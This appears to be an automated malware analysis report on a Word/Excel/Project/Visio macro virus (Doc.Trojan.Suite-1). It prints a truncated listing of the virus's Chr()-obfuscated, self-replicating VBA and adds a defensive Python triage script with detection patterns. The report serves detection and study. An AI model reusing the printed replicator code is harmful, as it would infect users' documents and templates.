Verdict: MALICIOUS
Risk Score: 280
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The file is an Office document containing VBA macros. Heuristics flag Shell(), CreateObject() and GetObject() calls, which are the usual VBA primitives for launching processes and instantiating COM objects; none of the three falls inside the truncated preview below, so their arguments cannot be assessed from this page. The visible part of the macro is a cross-application replicator: on Document_Close it inspects the host application name, walks the VBProject code modules of every open Microsoft Project project, every open document in a host whose name does not start with "Micro" (the .vsd/.vss/.vst handling and the "Visio.Application" string at the top point at Visio), the Word Normal template and the active Excel workbook, and wherever line 2 of the target module is not a comment marker it deletes that module's lines and inserts its own source (DeleteLines/InsertLines, then SaveAs on a template). In Word it also sets Options.SendMailAttach. Host names and the "Sub Document_Close()" header are assembled from Chr() calls rather than written as literals, which defeats naive string matching. ClamAV identifies the file as Doc.Trojan.Suite-1; nothing in the visible code downloads additional payloads, so any such behaviour would have to sit in the unrendered remainder of the macro.
Heuristics (5)

| Finding | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Trojan.Suite-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Trojan.Suite-1 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call |
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46828 bytes | 0c3889ff85e4bb8bdf8246f1d2a909e2d5bb85775ff2c5893b338144693e5540 | ClamAV: Doc.Trojan.Suite-1 | unlikely |
Preview script: first 1,000 lines of the extracted script (the listing below is cut off well before that point)
```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Modul 1"
Sub Document_Close()
'
mut$ = "Visio.Application": mat$ = "Blank Drawing.vst": dovis = 1
On Error Resume Next
t = Application
If t = Chr(78) + Chr(111) + Chr(116) + Chr(104) + Chr(105) + Chr(110) + Chr(103) Then GoTo nopro
If t = "Microsoft Project" Then
mook = Version
If mook = "8.0" Then
'
End If
Application.DisplayAlerts = False
'
For Each Z In Projects
On Error Resume Next
Set ap = Z.VBProject.VBComponents(1).codemodule
Set tp = ThisProject.VBProject.VBComponents(1).codemodule
If ap.Lines(2, 1) <> "'" Then
ap.DeleteLines 1, ap.countoflines
ap.InsertLines 1, tp.Lines(1, tp.countoflines)
'
End If
Next Z
Set temp = Application.VBE.VBProjects(1).VBComponents(1).codemodule
If temp.Lines(2, 1) <> Chr(39) Then
temp.DeleteLines 1, temp.countoflines
temp.InsertLines 1, tp.Lines(1, tp.countoflines)
End If
End If
vi:
te$ = t: tune = Left(te$, 5)
If tune <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) Then
Set nom = ThisDocument.VBProject.VBComponents(1).codemodule
For i = 1 To Documents.Count
Set docobj = Documents.Item(i)
Set gets = docobj.VBProject.VBComponents(1).codemodule
If gets.Lines(2, 1) <> Chr(39) Then
gets.InsertLines 1, nom.Lines(1, nom.countoflines)
dname = CurDir & "\": filechk$ = (dname & docobj)
mystr = Right(filechk$, 4): If mystr <> ".vsd" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vss" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vst" Then sd = 0
If sd = 0 Then fila$ = (dname & docobj & ".vsd")
'
End If
toobig:
Next i
If strTemplatename = "" Then GoTo runaway
'
Set Target = Documents.Open(strTemplatename)
Set targets = Target.VBProject.VBComponents(1).codemodule
If targets.Lines(2, 1) <> "'" Then
If targets.Lines(1, 1) = "Option Explicit" Then Target.DeleteLines 1, 1
targets.InsertLines 1, rnt.Lines(1, rnt.countoflines)
Target.SaveAs strTemplatename
Else
toobigtemplate:
Target.Close
End If
runaway:
End If
If t = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(87) + Chr(111) + Chr(114) + Chr(100) Then Else GoTo ex
Options.SendMailAttach = True: m = 1
Set nim = NormalTemplate
Set aiv = ActiveDocument
Set aktiv = aiv.VBProject.VBComponents(m).codemodule
Set nom = nim.VBProject.VBComponents(m).codemodule
If nom.Lines(2, 1) <> "'" Then
nom.DeleteLines 1, nom.countoflines
nom.InsertLines 1, aktiv.Lines(1, aktiv.countoflines)
nom.replaceline 1, Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(67) + Chr(108) + Chr(111) + Chr(115) + Chr(101) + Chr(40) + Chr(41)
nop = 1
End If
If aktiv.Lines(2, 1) <> "'" Then
act = 1
End If
ex:
If act = 1 Then GoTo 11
If t = "Microsoft Excel" Then Else GoTo 12
Set a = ActiveWorkbook.VBProject
Set aktiv = a.VBComponents("ThisWorkbook").codemodule
Set nimt = ThisWorkbook.VBProject
Set nom = nimt.VBComponents("ThisWorkbook").codemodule
11:
If aktiv.Lines(2, 1) <
```
... (truncated)
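The script below is an added example for this report, not the analyzer's own code and not part of oletools. It takes decoded VBA source such as the extracted macros.bas, re-implements the page's three VBA heuristics (OLE_VBA_SHELL, OLE_VBA_CREATEOBJ, OLE_VBA_GETOBJ) as case-insensitive regexes, adds indicators for the VBProject self-replication and auto-execute entry point visible in the preview, and decodes the Chr() chains so the host checks read as plain text. The X_* indicator ids and their severities are assumptions of this example; the embedded sample is constructed from six lines copied out of the preview plus two made-up lines that exercise the Shell/CreateObject rules the truncated preview never reaches.

```python
"""Static triage of decoded VBA source (added example; assumed X_* indicator ids)."""
import re
from typing import Dict, List, Tuple

# A Chr(n) call, optionally chained with + or & (both concatenate strings in VBA).
_CHR_CHAIN = re.compile(r"Chr\(\s*\d+\s*\)(?:\s*[+&]\s*Chr\(\s*\d+\s*\))*", re.I)
_CHR_ARG = re.compile(r"Chr\(\s*(\d+)\s*\)", re.I)

# (id, severity, pattern). VBA identifiers are case-insensitive, hence re.I.
# OLE_VBA_* ids and severities are the report's; X_* ids are assumed for this example.
INDICATORS = [
    ("OLE_VBA_SHELL",      "critical", re.compile(r"\bShell\s*\(", re.I)),
    ("OLE_VBA_CREATEOBJ",  "high",     re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_GETOBJ",     "high",     re.compile(r"\bGetObject\s*\(", re.I)),
    ("X_AUTOEXEC",         "medium",   re.compile(
        r"\bSub\s+(Document_(Open|Close)|Auto(Open|Close|Exec)|Workbook_(Open|BeforeClose))\b", re.I)),
    ("X_VBPROJECT_ACCESS", "high",     re.compile(r"\.VBProject\b", re.I)),
    ("X_CODEMODULE_WRITE", "high",     re.compile(r"\.(InsertLines|DeleteLines|ReplaceLine)\b", re.I)),
    ("X_NORMAL_TEMPLATE",  "medium",   re.compile(r"\bNormalTemplate\b", re.I)),
    ("X_CHR_OBFUSCATION",  "medium",   re.compile(r"Chr\(\s*\d+\s*\)\s*[+&]\s*Chr\(", re.I)),
]
SEVERITY_RANK = {"critical": 3, "high": 2, "medium": 1}


def decode_chr_chains(vba: str) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_text) for every Chr()-built string in the source."""
    found = []
    for lineno, line in enumerate(vba.splitlines(), 1):
        for m in _CHR_CHAIN.finditer(line):
            codes = [int(c) for c in _CHR_ARG.findall(m.group(0))]
            found.append((lineno, "".join(chr(c) for c in codes)))
    return found


def deobfuscate(vba: str) -> str:
    """Rewrite each Chr() chain as a quoted VBA literal so comparisons read plainly."""
    def to_literal(m: "re.Match") -> str:
        codes = [int(c) for c in _CHR_ARG.findall(m.group(0))]
        text = "".join(chr(c) for c in codes).replace('"', '""')  # VBA escapes " as ""
        return '"' + text + '"'
    return _CHR_CHAIN.sub(to_literal, vba)


def scan_indicators(vba: str) -> Dict[str, Dict[str, object]]:
    """Map indicator id -> {'severity': ..., 'lines': [...]} for every rule that hits."""
    hits: Dict[str, Dict[str, object]] = {}
    for lineno, line in enumerate(vba.splitlines(), 1):
        for ind_id, severity, pattern in INDICATORS:
            if pattern.search(line):
                hits.setdefault(ind_id, {"severity": severity, "lines": []})["lines"].append(lineno)
    return hits


def overall_severity(hits: Dict[str, Dict[str, object]]) -> str:
    """Highest severity among the hits, or 'none' when nothing matched."""
    if not hits:
        return "none"
    return max(hits.values(), key=lambda h: SEVERITY_RANK[h["severity"]])["severity"]


# Constructed input: lines 1-6 are copied from the report's preview (numbering differs
# there); lines 7-8 are made up to exercise the rules the truncated preview never reaches.
SAMPLE = "\n".join([
    "Sub Document_Close()",
    "If t = Chr(78) + Chr(111) + Chr(116) + Chr(104) + Chr(105) + Chr(110) + Chr(103) Then GoTo nopro",
    "Set nom = ThisDocument.VBProject.VBComponents(1).codemodule",
    "If temp.Lines(2, 1) <> Chr(39) Then",
    "nom.replaceline 1, Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(67) + Chr(108) + Chr(111) + Chr(115) + Chr(101) + Chr(40) + Chr(41)",
    "Set nim = NormalTemplate",
    "Set o = CreateObject(\"WScript.Shell\")    ' constructed line, not from the sample",
    "x = Shell(\"cmd.exe /c echo constructed\", vbHide)    ' constructed line, not from the sample",
])

if __name__ == "__main__":
    import sys
    # Usage: python triage.py macros.bas   (file name is hypothetical; defaults to SAMPLE)
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    hits = scan_indicators(src)
    for ind_id, h in hits.items():
        print(f"{h['severity']:<9} {ind_id:<20} lines {h['lines']}")
    for lineno, text in decode_chr_chains(src):
        print(f"line {lineno}: Chr() chain decodes to {text!r}")
    print("overall:", overall_severity(hits))
```

Run it against the olevba output rather than the raw document: the regexes see only decompressed source, so on the original OLE file they would miss everything. The deobfuscated text also makes the host dispatch obvious (`If t = "Nothing"`, `Left(te$, 5) <> "Micro"`, `If t = "Microsoft Word"`), which is what the Chr() chains were hiding from simple string scans.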